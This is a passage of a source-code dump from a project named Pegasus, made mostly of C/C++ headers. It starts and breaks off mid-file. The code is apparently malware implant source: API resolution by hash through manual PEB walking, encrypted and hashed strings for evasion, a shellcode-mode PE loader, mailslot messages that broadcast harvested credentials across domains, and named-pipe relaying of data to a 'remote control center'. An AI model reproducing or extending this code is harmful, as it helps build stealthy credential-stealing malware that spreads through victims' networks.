| 41 | VOID DomainListMachines_imports(DomainListMachines_ptrs *apis); 42 | 43 | #endif -------------------------------------------------------------------------------- 
/Pegasus/inc/DynImports.h: -------------------------------------------------------------------------------- 1 | /* 2 | DynImports.h 3 | Headers file 4 | */ 5 | 6 | 7 | #include 8 | 9 | #include 10 | 11 | // Redefine PEB structures. The structure definitions in winternl.h are incomplete. 12 | // copy from shellcode version 13 | 14 | typedef struct _MY_PEB { 15 | BYTE InheritedAddressSpace; 16 | BYTE ReadImageFileExecOptions; 17 | BYTE BeingDebugged; 18 | BYTE Spare; 19 | LPVOID Mutant; 20 | LPVOID ImageBaseAddress; 21 | LPVOID LoaderData; 22 | LPVOID ProcessParameters; 23 | LPVOID SubSystemData; 24 | LPVOID ProcessHeap; 25 | LPVOID FastPebLock; 26 | LPVOID FastPebLockRoutine; 27 | LPVOID FastPebUnlockRoutine; 28 | LPVOID EnvironmentUpdateCount; 29 | LPVOID KernelCallbackTable; 30 | LPVOID SystemReserved; 31 | LPVOID AtlThunkSListPtr32; 32 | } MY_PEB, *PMY_PEB; 33 | 34 | 35 | typedef struct _MY_PEB_LDR_DATA { 36 | ULONG Length; 37 | BOOL Initialized; 38 | PVOID SsHandle; 39 | LIST_ENTRY InLoadOrderModuleList; 40 | LIST_ENTRY InMemoryOrderModuleList; 41 | LIST_ENTRY InInitializationOrderModuleList; 42 | } MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA; 43 | 44 | typedef struct _MY_LDR_DATA_TABLE_ENTRY 45 | { 46 | LIST_ENTRY InLoadOrderLinks; 47 | LIST_ENTRY InMemoryOrderLinks; 48 | LIST_ENTRY InInitializationOrderLinks; 49 | PVOID DllBase; 50 | PVOID EntryPoint; 51 | ULONG SizeOfImage; 52 | UNICODE_STRING FullDllName; 53 | UNICODE_STRING BaseDllName; 54 | } MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY; 55 | 56 | 57 | // global internal struct 58 | typedef struct _diLibsState 59 | { 60 | WORD wStructSize; // size of structure 61 | 62 | // dlls directory path 63 | LPWSTR wszSystemDllPath; // like 'c:\windows\system32\' 64 | LPWSTR wszSystemDllSeekMask; // like 'c:\windows\system32\*.*' 65 | 66 | // guard cs 67 | CRITICAL_SECTION csGuard; 68 | 69 | // already found records (libraries, apis) 70 | // in a form of linked list 71 | // ... 
72 | 73 | } diLibsState, *PdiLibsState; 74 | 75 | 76 | // definition of enum func for diEnumExports() 77 | typedef BOOL (__stdcall *PDI_ENUM_EXPORTS_CALLBACK)( LPSTR szExportName, LPVOID pFuncAddr, LPVOID pParameter ); // should return FALSE to stop enum 78 | typedef PDI_ENUM_EXPORTS_CALLBACK LPDI_ENUM_EXPORTS_CALLBACK; 79 | 80 | 81 | // declarations 82 | #ifdef __cplusplus 83 | extern "C" { 84 | #endif 85 | HMODULE LoadLibraryByHash(UINT64 i64Hash, BOOL bMemLoadDependencies, BOOL bCallDllMain); 86 | BOOL LoadAPIs(HMODULE hLib, PUINT64 pi64HashesArray, UINT iElementsCount, LPVOID pStorePtrsArray); 87 | UINT64 diHashName(LPWSTR wszNameToHashIn); 88 | BOOL diLoadAPI(HMODULE hLib, UINT64 i64Hash, LPVOID *pStorePlace); 89 | LPWSTR diGetSystemDllsPath(); 90 | BOOL diEnumExports(HMODULE hLib, PDI_ENUM_EXPORTS_CALLBACK pEnumFunc, LPVOID pParameter); 91 | HMODULE GetModuleHandleByHash(UINT64 i64Hash); 92 | #ifdef __cplusplus 93 | } 94 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/HashDeriveFuncs.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | HashDeriveFuncs.cpp 3 | Routines to generate target hash from some source 4 | Used to init rnd pseudo-random number generators from constant source 5 | */ 6 | 7 | #include 8 | 9 | #include "dbg.h" 10 | #include "mem.h" 11 | #include "HashedStrings.h" 12 | #include "CryptoStrings.h" 13 | 14 | #include "HashDeriveFuncs.h" 15 | 16 | LPWSTR g_wszLocalMachineName = NULL; 17 | 18 | /* 19 | Calculates a CONSTANT hash from target machine name (without ^ HASHSTR_RND_XOR) 20 | wszTargetMachineName may be NULL to indicate local machine (a name will be queried internally and stored) 21 | or some other machine in format '\\WS-NAME'. 
Also supported '\\*' format if needed by caller 22 | */ 23 | UINT64 i64CalcTargetMachineHash(LPWSTR wszTargetMachineName) 24 | { 25 | DWORD dwLen; // tmp len var 26 | LPWSTR wszResBuff, wszS; 27 | UINT64 i64Res = 0; // func result 28 | 29 | do { // not a loop 30 | 31 | // directly hash if used passed param 32 | if (wszTargetMachineName) { i64Res = HashStringW_const(wszTargetMachineName); break; } 33 | 34 | // need to query local machine's name 35 | if (!g_wszLocalMachineName) { 36 | 37 | g_wszLocalMachineName = (LPWSTR)my_alloc(1024); 38 | dwLen = MAX_COMPUTERNAME_LENGTH + 1; 39 | GetComputerName(g_wszLocalMachineName, &dwLen); 40 | 41 | } // !g_wszLocalMachineName 42 | 43 | // form resulting buffer 44 | wszResBuff = (LPWSTR)my_alloc(1024); 45 | wszS = CRSTRW("\\\\", "\x00\x20\xdc\x0d\x02\x20\xe0\x39\xd8\xa4\xd2"); 46 | lstrcat(wszResBuff, wszS); 47 | lstrcat(wszResBuff, g_wszLocalMachineName); 48 | my_free(wszS); 49 | 50 | // calc hash 51 | i64Res = HashStringW_const(wszResBuff); 52 | DbgPrint("formatted local machine name [%ws], hash %08X%08X", wszResBuff, (DWORD)(i64Res << 32), (DWORD)i64Res); 53 | my_free(wszResBuff); 54 | 55 | } while (FALSE); // not a loop 56 | 57 | 58 | return i64Res; 59 | } -------------------------------------------------------------------------------- /Pegasus/inc/HashDeriveFuncs.h: -------------------------------------------------------------------------------- 1 | /* 2 | HashDeriveFuncs.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | UINT64 i64CalcTargetMachineHash(LPWSTR wszTargetMachineName); -------------------------------------------------------------------------------- /Pegasus/inc/HashedStrings.h: -------------------------------------------------------------------------------- 1 | /* 2 | HashedStrings.h 3 | Misc routines and macro definition for hashed string usage 4 | ROUTINES_BY_PTR supported 5 | NB: uses per-build unique HASHSTR_RND_XOR value, take care when using compiled (not by reference) versions 6 | between 
different projects! 7 | 8 | NB: assumed to be used via source-code parser, which recalculates values of: 9 | 10 | HASHSTR(, 0x0BADF00D) - hash pseudo-macro 11 | STRHASH_ALGID(n) - which algo (possibly bitfields) is used in this build 12 | STRHASH_PARAM(n) - algo's param to be used for extra randomness 13 | 14 | */ 15 | 16 | #pragma once 17 | 18 | #include 19 | 20 | // define per-build hash randomization 21 | // NB: take care about passing hashes between differently compiled modules, to prevent problems 22 | // this value is changed on each build 23 | #define HASHSTR_RND_XOR STRHASH_PARAM(0x16ca75882606765a) 24 | 25 | // define hash pseudo macros 26 | // NB: these are without = sign, so parser should not touch them 27 | #define HASHSTR(original_string, i64Hash) i64Hash ^ HASHSTR_RND_XOR 28 | #define HASHSTR_CONST(original_string, i64Hash) i64Hash 29 | #define STRHASH_ALGID(alg_id) alg_id 30 | #define STRHASH_PARAM(alg_param) alg_param 31 | 32 | // define functions for import-export, used in both compilation modes 33 | typedef struct _HashedStrings_ptrs { 34 | 35 | // WORD wFunctionCount; // to distinct between different versions 36 | 37 | UINT64(*fnHashStringA)(LPCSTR szStringToHash); 38 | UINT64(*fnHashStringW)(LPCWSTR wszStringToHash); 39 | UINT64(*fnHashStringA_const)(LPCSTR szStringToHash); 40 | UINT64(*fnHashStringW_const)(LPCWSTR wszStringToHash); 41 | UINT64(*fnHashBin)(LPVOID pBin, DWORD dwBinLen); 42 | UINT64(*fnHashBin_const)(LPVOID pBin, DWORD dwBinLen); 43 | 44 | } HashedStrings_ptrs, *PHashedStrings_ptrs; 45 | 46 | #ifdef ROUTINES_BY_PTR 47 | 48 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 49 | 50 | // global var definition to be visible by all modules which use this one 51 | extern HashedStrings_ptrs HashedStrings_apis; 52 | 53 | // transparent code replacements 54 | #define HashStringA HashedStrings_apis.fnHashStringA 55 | #define HashStringW HashedStrings_apis.fnHashStringW 56 | #define HashStringA_const 
HashedStrings_apis.fnHashStringA_const 57 | #define HashStringW_const HashedStrings_apis.fnHashStringW_const 58 | #define HashBin HashedStrings_apis.fnHashBin 59 | #define HashBin_const HashedStrings_apis.fnHashBin_const 60 | 61 | VOID HashedStrings_resolve(HashedStrings_ptrs *apis); 62 | 63 | #else 64 | 65 | // declarations - compile as code 66 | UINT64 HashStringA(LPCSTR szStringToHash); 67 | UINT64 HashStringW(LPCWSTR wszStringToHash); 68 | UINT64 HashStringA_const(LPCSTR szStringToHash); 69 | UINT64 HashStringW_const(LPCWSTR wszStringToHash); 70 | UINT64 HashBin(LPVOID pBin, DWORD dwBinLen); 71 | UINT64 HashBin_const(LPVOID pBin, DWORD dwBinLen); 72 | 73 | VOID HashedStrings_imports(HashedStrings_ptrs *apis); 74 | 75 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/LZ4/bench.h: -------------------------------------------------------------------------------- 1 | /* 2 | bench.h - Demo program to benchmark open-source compression algorithm 3 | Copyright (C) Yann Collet 2012 4 | 5 | This program is free software; you can redistribute it and/or modify 6 | it under the terms of the GNU General Public License as published by 7 | the Free Software Foundation; either version 2 of the License, or 8 | (at your option) any later version. 9 | 10 | This program is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | GNU General Public License for more details. 14 | 15 | You should have received a copy of the GNU General Public License along 16 | with this program; if not, write to the Free Software Foundation, Inc., 17 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 
18 | 19 | You can contact the author at : 20 | - LZ4 homepage : http://fastcompression.blogspot.com/p/lz4.html 21 | - LZ4 source repository : http://code.google.com/p/lz4/ 22 | */ 23 | #pragma once 24 | 25 | #if defined (__cplusplus) 26 | extern "C" { 27 | #endif 28 | 29 | 30 | int BMK_benchFile(char** fileNamesTable, int nbFiles, int cLevel); 31 | 32 | // Parameters 33 | void BMK_SetBlocksize(int bsize); 34 | void BMK_SetNbIterations(int nbLoops); 35 | 36 | 37 | 38 | #if defined (__cplusplus) 39 | } 40 | #endif 41 | -------------------------------------------------------------------------------- /Pegasus/inc/LocalStorage.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | LocalStorage.cpp 3 | Routines for storing some information chunks locally, to be processed later 4 | */ 5 | 6 | #include 7 | 8 | #include "mem.h" 9 | #include "dbg.h" 10 | #include "CryptoStrings.h" 11 | #include "RandomGen.h" 12 | 13 | #include "LocalStorage.h" 14 | 15 | 16 | /* 17 | Performs initialization of persistent local storage 18 | */ 19 | VOID lsInitLocalStorage() 20 | { 21 | DbgPrint("entered"); 22 | 23 | } -------------------------------------------------------------------------------- /Pegasus/inc/LocalStorage.h: -------------------------------------------------------------------------------- 1 | /* 2 | LocalStorage.h 3 | */ 4 | 5 | #include 6 | 7 | typedef enum StorageItemSourceEnum { 8 | SI_ERROR = 0, // not defined source, assumed to be an error 9 | SI_FROM_REMOTE_CONTROL_CENTER, // data got from remote controller server, to be sent to some machine inside of network (if node is acting as proxy for others) 10 | SI_FOR_REMOTE_CONTROL_CENTER, // data to be uploaded to remote machine 11 | 12 | SI_MAXVALUE = 255 // max value to fit BYTE in serialized version of structure 13 | }; 14 | 15 | 16 | // describe item from a local storage in a memory linked list 17 | typedef struct _LOCAL_STORAGE_ITEM 18 | { 19 | StorageItemSourceEnum siSource; // 
type of source which created this item 20 | DWORD dwItemUniqId; 21 | 22 | LPVOID pData; // encoded and/or packed data 23 | SIZE_T lDataLen; // len of data in ^ 24 | 25 | } LOCAL_STORAGE_ITEM, *PLOCAL_STORAGE_ITEM; 26 | 27 | 28 | VOID lsInitLocalStorage(); -------------------------------------------------------------------------------- /Pegasus/inc/MailslotWorks.h: -------------------------------------------------------------------------------- 1 | /* 2 | MailslotWorks.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | #include "DataCallbackManager.h" 8 | 9 | #define MAILSLOT_MSG_BUFFER_SIZE 1024 10 | 11 | // MAILSLOT_MESSAGE_ENVELOPE.bMessageId, specified in header 12 | typedef enum ENUM_MAILSLOT_MESSAGE_ID { 13 | MMI_NONE = 0, // nothing defined 14 | MMI_CREDENTIALS, // CredManager.cpp use to broadcast it's auth creds 15 | MMI_NETWORK_ENABLED_SEARCH, // NetworkConnectivity.cpp, issue this to search for network-enabled machines 16 | MMI_NETWORK_ENABLED_ANSWER, // -//-, every machine with remote network working answers with this code and self name appended in pData 17 | 18 | MMI_MAXVAL = MAXBYTE // max value to fit into byte 19 | }; 20 | 21 | // params passed to callback function from mwSendMailslotMessageToAllDomains() 22 | typedef struct _MW_CALLBACK_PARAMS { 23 | LPVOID pData; // data buffer to be broadcasted, <400 bytes recommended 24 | DWORD dwDataLen; // len of data in ^ to be sent 25 | BYTE bMailslotMessageId; // id of message to be sent, set in header 26 | 27 | DWORD dwMessagesSent; // amount of successfully sent messages (used by func to determine if any domain was enumed) 28 | 29 | } MW_CALLBACK_PARAMS, *PMW_CALLBACK_PARAMS; 30 | 31 | // for mwInitMailslotServer() to pass params to server thread 32 | typedef struct _MW_INITSERVER_PARAMS { 33 | 34 | CLIENTDISPATCHERFUNC cdCallback; // callback to be issued on each data received 35 | HANDLE hSlot; // server mailslot handle to wait forever on 36 | 37 | } MW_INITSERVER_PARAMS, *PMW_INITSERVER_PARAMS; 38 | 39 | 40 
| 41 | // define functions for import-export, used in both compilation modes 42 | typedef struct _MailslotWorks_ptrs { 43 | 44 | VOID (*fnmwInitMailslotServer)(CLIENTDISPATCHERFUNC cdCallback); 45 | 46 | BOOL(*fnmwSendMailslotMessageToDomain)(LPVOID pBuffer, DWORD dwMessageLen, LPWSTR wszTargetDomain, BYTE bMailslotMessageId); 47 | BOOL(*fnmwSendMailslotMessageToMainDomain)(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 48 | BOOL(*fnmwSendMailslotMessageToAllDomains)(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 49 | 50 | } MailslotWorks_ptrs, *PMailslotWorks_ptrs; 51 | 52 | 53 | #ifdef ROUTINES_BY_PTR 54 | 55 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 56 | 57 | // global var definition to be visible by all modules which use this one 58 | extern MailslotWorks_ptrs MailslotWorks_apis; 59 | 60 | // transparent code replacements 61 | #define mwInitMailslotServer MailslotWorks_apis.fnmwInitMailslotServer 62 | #define mwSendMailslotMessageToDomain MailslotWorks_apis.fnmwSendMailslotMessageToDomain 63 | #define mwSendMailslotMessageToMainDomain MailslotWorks_apis.fnmwSendMailslotMessageToMainDomain 64 | #define mwSendMailslotMessageToAllDomains MailslotWorks_apis.fnmwSendMailslotMessageToAllDomains 65 | 66 | VOID MailslotWorks_resolve(MailslotWorks_ptrs *apis); 67 | 68 | #else 69 | 70 | VOID mwInitMailslotServer(CLIENTDISPATCHERFUNC cdCallback); 71 | BOOL mwSendMailslotMessageToDomain(LPVOID pBuffer, DWORD dwMessageLen, LPWSTR wszTargetDomain, BYTE bMailslotMessageId); 72 | BOOL mwSendMailslotMessageToMainDomain(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 73 | BOOL mwSendMailslotMessageToAllDomains(LPVOID pBuffer, DWORD dwMessageLen, BYTE bMailslotMessageId); 74 | 75 | VOID MailslotWorks_imports(MailslotWorks_ptrs *apis); 76 | 77 | 78 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/MyStreams.h: 
-------------------------------------------------------------------------------- 1 | /* 2 | MyStreams.h 3 | Headers file 4 | */ 5 | 6 | #include 7 | #pragma once 8 | 9 | // initial size of buffer 10 | #define MY_STREAM_INIT_SIZE 102400 11 | 12 | // pseudo-stream definition 13 | typedef struct _MY_STREAM MY_STREAM; 14 | typedef struct _MY_STREAM { 15 | 16 | LPVOID pData; // data buffer ptr 17 | SIZE_T lDataLen; // amount of data currently in buffer 18 | SIZE_T lMaxBufferLen; // max amount of data currently able to fit in buffer 19 | 20 | // exported methods 21 | VOID (*msFreeStream) (MY_STREAM *pStream); 22 | VOID (*msWriteStream) (MY_STREAM *pStream, LPVOID pData, SIZE_T lDataLen); 23 | SIZE_T (*msReadStream) (MY_STREAM *pStream, LPVOID pReadBuffer, SIZE_T lReadBufferLen); 24 | 25 | } MY_STREAM, *PMY_STREAM; 26 | 27 | #ifdef __cplusplus 28 | extern "C" { 29 | #endif 30 | 31 | // apis 32 | BOOL msInitStream_(MY_STREAM *pStream); 33 | 34 | #ifdef _DEBUG 35 | BOOL msInitStream_dbg(LPSTR szCaller, MY_STREAM *pStream); 36 | #endif 37 | 38 | //VOID msFreeStream(MY_STREAM *pStream); 39 | //VOID msWriteStream(MY_STREAM *pStream, LPVOID pData, SIZE_T lDataLen); 40 | //SIZE_T msReadStream(MY_STREAM *pStream, LPVOID pReadBuffer, SIZE_T lReadBufferLen); 41 | 42 | #ifdef __cplusplus 43 | } 44 | #endif 45 | 46 | #ifndef _DEBUG 47 | #define msInitStream msInitStream_ 48 | #else 49 | #define msInitStream(ms) msInitStream_dbg(__FUNCTION__"@"QUOTE(__LINE__), ms) 50 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/MyStringRoutines.h: -------------------------------------------------------------------------------- 1 | /* 2 | MyStringRoutines.h 3 | Headers file 4 | 5 | */ 6 | #pragma once 7 | 8 | #include 9 | #include "RandomGen.h" 10 | 11 | 12 | // define functions for import-export, used in both compilation modes 13 | typedef struct _MyStringRoutines_ptrs { 14 | 15 | DWORD (*fnsr_replacechar)(LPWSTR wszString, WCHAR wCharToFind, 
WCHAR wCharToSet); 16 | VOID(*fnsr_replacelastchar)(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 17 | VOID(*fnsr_genRandomChars)(WORD wStringLenMin, WORD wStringLenMax, WCHAR *wszOutbuffer); 18 | VOID(*fnsr_genRandomCharsRG)(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 19 | VOID(*fnsr_genRandomCharsRG_h)(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 20 | LPWSTR(*fnsr_findlastchar)(LPWSTR wszString, WCHAR wCharToFind); 21 | VOID(*fnsr_lowercase)(LPWSTR wszString); 22 | 23 | } MyStringRoutines_ptrs, *PMyStringRoutines_ptrs; 24 | 25 | 26 | 27 | 28 | #ifdef ROUTINES_BY_PTR 29 | 30 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 31 | 32 | // global var definition to be visible by all modules which use this one 33 | extern MyStringRoutines_ptrs MyStringRoutines_apis; 34 | 35 | // transparent code replacements 36 | #define sr_replacechar MyStringRoutines_apis.fnsr_replacechar 37 | #define sr_replacelastchar MyStringRoutines_apis.fnsr_replacelastchar 38 | #define sr_genRandomChars MyStringRoutines_apis.fnsr_genRandomChars 39 | #define sr_genRandomCharsRG MyStringRoutines_apis.fnsr_genRandomCharsRG 40 | #define sr_genRandomCharsRG_h MyStringRoutines_apis.fnsr_genRandomCharsRG_h 41 | #define sr_findlastchar MyStringRoutines_apis.fnsr_findlastchar 42 | #define sr_lowercase MyStringRoutines_apis.fnsr_lowercase 43 | 44 | 45 | VOID MyStringRoutines_resolve(MyStringRoutines_ptrs *apis); 46 | 47 | #else 48 | 49 | 50 | 51 | 52 | #ifdef __cpluplus 53 | extern "C" { 54 | #endif 55 | 56 | DWORD sr_replacechar(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 57 | VOID sr_replacelastchar(LPWSTR wszString, WCHAR wCharToFind, WCHAR wCharToSet); 58 | VOID sr_genRandomChars(WORD wStringLenMin, WORD wStringLenMax, WCHAR *wszOutbuffer); 59 | VOID sr_genRandomCharsRG(RndClass *rg, WORD wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 60 | VOID sr_genRandomCharsRG_h(RndClass *rg, WORD 
wStringLenMin, WORD wStringLenMax, LPWSTR wszOutbuffer); 61 | LPWSTR sr_findlastchar(LPWSTR wszString, WCHAR wCharToFind); 62 | VOID sr_lowercase(LPWSTR wszString); 63 | 64 | VOID MyStringRoutines_imports(MyStringRoutines_ptrs *apis); 65 | 66 | #ifdef __cpluplus 67 | } 68 | #endif 69 | 70 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/NetMessageEnvelope.h: -------------------------------------------------------------------------------- 1 | /* 2 | NetMessageEnvelope.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | #pragma pack(push) 11 | #pragma pack(1) 12 | // special structure to envelope all network messages into 13 | typedef struct _NET_MESSAGE_ENVELOPE { 14 | 15 | DWORD dwRandomKey; // some random value to encode all other fields 16 | 17 | // --- hash is calculated starting from here --- 18 | BYTE bMessageHash[20]; // sha hash of all chunk except first dword with rnd encoding value 19 | 20 | // params to identify a message 21 | BYTE bMessageId; // id of message appended 22 | 23 | } NET_MESSAGE_ENVELOPE, *PNET_MESSAGE_ENVELOPE; 24 | #pragma pack(pop) 25 | 26 | VOID nmeMakeEnvelope(LPVOID pBuffer, DWORD dwBufferLen, BYTE bMessageId, LPVOID *pEnveloped, DWORD *dwEnvelopedLen); 27 | BOOL nmeCheckRemoveEnvelope(LPVOID pBuffer, DWORD *dwBufferLen, BYTE *bMessageId); -------------------------------------------------------------------------------- /Pegasus/inc/PELoader.h: -------------------------------------------------------------------------------- 1 | /* 2 | PELoader.h 3 | Headers file 4 | 5 | */ 6 | 7 | #pragma once 8 | 9 | #include 10 | 11 | #define PeSupGetImagePeHeader(Image) (PIMAGE_NT_HEADERS *)(##Image+*(DWORD *)(##Image+0x3C)); 12 | 13 | #define PeSupGetOptionalField(PeHeader, Field) \ 14 | (FIELD_OFFSET(IMAGE_OPTIONAL_HEADER32, ##Field) != FIELD_OFFSET(IMAGE_OPTIONAL_HEADER64, ##Field) && \ 15 | ((PIMAGE_NT_HEADERS32)PeHeader)->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64 ? 
\ 16 | ((PIMAGE_NT_HEADERS64)PeHeader)->OptionalHeader.##Field : \ 17 | ((PIMAGE_NT_HEADERS32)PeHeader)->OptionalHeader.##Field) 18 | 19 | #define PeSupGetDirectoryEntryPtr(PeHeader, Entry) \ 20 | (((PIMAGE_NT_HEADERS32)PeHeader)->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64 ? \ 21 | &((PIMAGE_NT_HEADERS64)PeHeader)->OptionalHeader.DataDirectory[##Entry] : \ 22 | &((PIMAGE_NT_HEADERS32)PeHeader)->OptionalHeader.DataDirectory[##Entry]) 23 | 24 | #define PeSupGetOptionalField(PeHeader, Field) \ 25 | (FIELD_OFFSET(IMAGE_OPTIONAL_HEADER32, ##Field) != FIELD_OFFSET(IMAGE_OPTIONAL_HEADER64, ##Field) && \ 26 | ((PIMAGE_NT_HEADERS32)PeHeader)->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64 ? \ 27 | ((PIMAGE_NT_HEADERS64)PeHeader)->OptionalHeader.##Field : \ 28 | ((PIMAGE_NT_HEADERS32)PeHeader)->OptionalHeader.##Field) 29 | 30 | #ifndef IMAGE_SIZEOF_BASE_RELOCATION 31 | #define IMAGE_SIZEOF_BASE_RELOCATION 8 32 | #endif 33 | 34 | #define IMAGE_REL_BASED_SHIFT 12 35 | #define IMAGE_REL_BASED_MASK 0xFFF 36 | 37 | typedef struct _IMAGE_BASE_RELOCATION_EX { 38 | DWORD VirtualAddress; 39 | DWORD SizeOfBlock; 40 | WORD TypeOffset[1]; 41 | } IMAGE_BASE_RELOCATION_EX; 42 | typedef IMAGE_BASE_RELOCATION_EX UNALIGNED * PIMAGE_BASE_RELOCATION_EX; 43 | 44 | #define RVATOVA( base, offset )(((SIZE_T)(base) + (SIZE_T)(offset))) 45 | 46 | 47 | typedef int (_stdcall *EntryPoint)(HANDLE, DWORD, LPVOID); 48 | 49 | 50 | 51 | 52 | 53 | #ifndef SHELLCODE_MODE 54 | // usual style 55 | BOOL PELoad(LPVOID pPE, LPVOID *pImage, SIZE_T *lImageSize, LPVOID *pEntryPoint ); 56 | 57 | 58 | #else 59 | 60 | // apis to be passed by shellcode startup code 61 | typedef struct _SHELLCODE_APIS 62 | { 63 | BYTE bSize; // verification field 64 | 65 | // apis from kernel32.dll 66 | LPVOID (WINAPI *p_VirtualAlloc) (LPVOID pAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 67 | BOOL (WINAPI *p_VirtualFree) (LPVOID pAddress, SIZE_T dwSize, DWORD dwFreeType); 68 | FARPROC (WINAPI *p_GetProcAddress) 
(HMODULE hModule, LPCSTR lpProcName); 69 | HMODULE (WINAPI *p_LoadLibraryA) (LPCSTR lpFileName); 70 | VOID (WINAPI *p_ExitProcess) (UINT uExitCode); 71 | VOID (WINAPI *p_Sleep) (DWORD dwMilliseconds); 72 | 73 | // dbg-only 74 | //VOID(WINAPI *p_OutputDebugStringA)(LPCSTR szDbgString); 75 | 76 | } SHELLCODE_APIS, *PSHELLCODE_APIS; 77 | 78 | 79 | // shellcode style 80 | BOOL PELoad(SHELLCODE_APIS *pAPIs, LPVOID pPE, LPVOID *pImage, SIZE_T *lImageSize, LPVOID *pEntryPoint ); 81 | 82 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/PipeWorks.h: -------------------------------------------------------------------------------- 1 | /* 2 | PipeWorks.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | #include "DataCallbackManager.h" 9 | 10 | #ifdef ROUTINES_BY_PTR 11 | #ifndef NO_TRANSPORT_ENVELOPE 12 | #define ROUTINES_BY_PTR_ALLOWED 13 | #endif 14 | #endif 15 | 16 | // less than 10k to allow connectionless remote send 17 | #define PIPE_BUFFER_SIZE 4096 18 | 19 | // NET_MESSAGE_ENVELOPE.bMessageId, specified in header 20 | typedef enum ENUM_PIPE_MESSAGE_ID { 21 | PMI_NONE = 0, // nothing defined 22 | PMI_SEND_QUERY, // issued when remote client needs to send some data chunk to network control center. 
Server should return id to check that query status later via PMI_CHECK_STATUS_QUERY 23 | PMI_CHECK_STATUS_QUERY, // after PMI_SEND_QUERY, client may periodically poll server to detect send status of a chunk 24 | 25 | PMI_TERMINATE_HOST_PROCESS___, // used by wdd to terminate other hosts with pipe running, to replace with a new version // DEPRECATED, not used from now 26 | PMI_TERMINATE_HOST_PROCESS_IF_LOWER_VERSION, // replacement for PMI_TERMINATE_HOST_PROCESS, which checks version of caller and target, so a lower version will be terminated (to prevent downgrades) 27 | 28 | PMI_MAXVAL = MAXBYTE // max value to fit into byte 29 | }; 30 | 31 | // define functions for import-export, used in both compilation modes 32 | typedef struct _PipeWorks_ptrs { 33 | 34 | DWORD (WINAPI *fnpwInitPipeServer)(LPVOID pParameter); 35 | void (*fnpwInitPipeServerAsync)(CLIENTDISPATCHERFUNC cdCallback); 36 | BOOL(*fnpwIsRemotePipeWorkingTimeout)(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec); 37 | BOOL(*fn_pwRemotePipeCheckSend)(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec, LPVOID pSendBuffer, DWORD lSendBufferLen, LPVOID *pAnswer, DWORD *pdwAnswerLen, BYTE *pbPipeMessageId); 38 | 39 | } PipeWorks_ptrs, *PPipeWorks_ptrs; 40 | 41 | // params sent to dispatcher thread 42 | typedef struct _DISPATCHER_THREAD_PARAMS { 43 | 44 | HANDLE hPipe; // pipe with client connected 45 | CRITICAL_SECTION *csDispatcherCall; // cs to guard calls to dispatcher proc to avoid mt problems 46 | CLIENTDISPATCHERFUNC cdCallback; // function to be called for ready combined data buffer 47 | 48 | } DISPATCHER_THREAD_PARAMS, *PDISPATCHER_THREAD_PARAMS; 49 | 50 | #ifdef ROUTINES_BY_PTR_ALLOWED 51 | 52 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 53 | 54 | // global var definition to be visible by all modules which use this one 55 | extern PipeWorks_ptrs PipeWorks_apis; 56 | 57 | // transparent code replacements 58 | #define 
pwInitPipeServer PipeWorks_apis.fnpwInitPipeServer 59 | #define pwInitPipeServerAsync PipeWorks_apis.fnpwInitPipeServerAsync 60 | #define pwIsRemotePipeWorkingTimeout PipeWorks_apis.fnpwIsRemotePipeWorkingTimeout 61 | #define _pwRemotePipeCheckSend PipeWorks_apis.fn_pwRemotePipeCheckSend 62 | 63 | VOID PipeWorks_resolve(PipeWorks_ptrs *apis); 64 | 65 | #else 66 | 67 | DWORD WINAPI pwInitPipeServer(LPVOID pParameter); 68 | void pwInitPipeServerAsync(CLIENTDISPATCHERFUNC cdCallback); 69 | BOOL pwIsRemotePipeWorkingTimeout(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec); 70 | BOOL _pwRemotePipeCheckSend(LPWSTR wszTargetMachineName, DWORD dwTimeoutMsec, DWORD dwRecheckIntervalMsec, LPVOID pSendBuffer, DWORD lSendBufferLen, LPVOID *pAnswer, DWORD *pdwAnswerLen, BYTE *pbPipeMessageId); 71 | 72 | VOID PipeWorks_imports(PipeWorks_ptrs *apis); 73 | 74 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/RandomGen.h: -------------------------------------------------------------------------------- 1 | /* 2 | RandomGen.h 3 | Headers file 4 | 5 | */ 6 | 7 | #pragma once 8 | 9 | #define MAKE_UINT64(high, low) (UINT64)( ((UINT64)high << 32 ) | (DWORD)low ) 10 | 11 | // declarate struc with no definition, to allow self-links in method 12 | typedef struct _RndClass 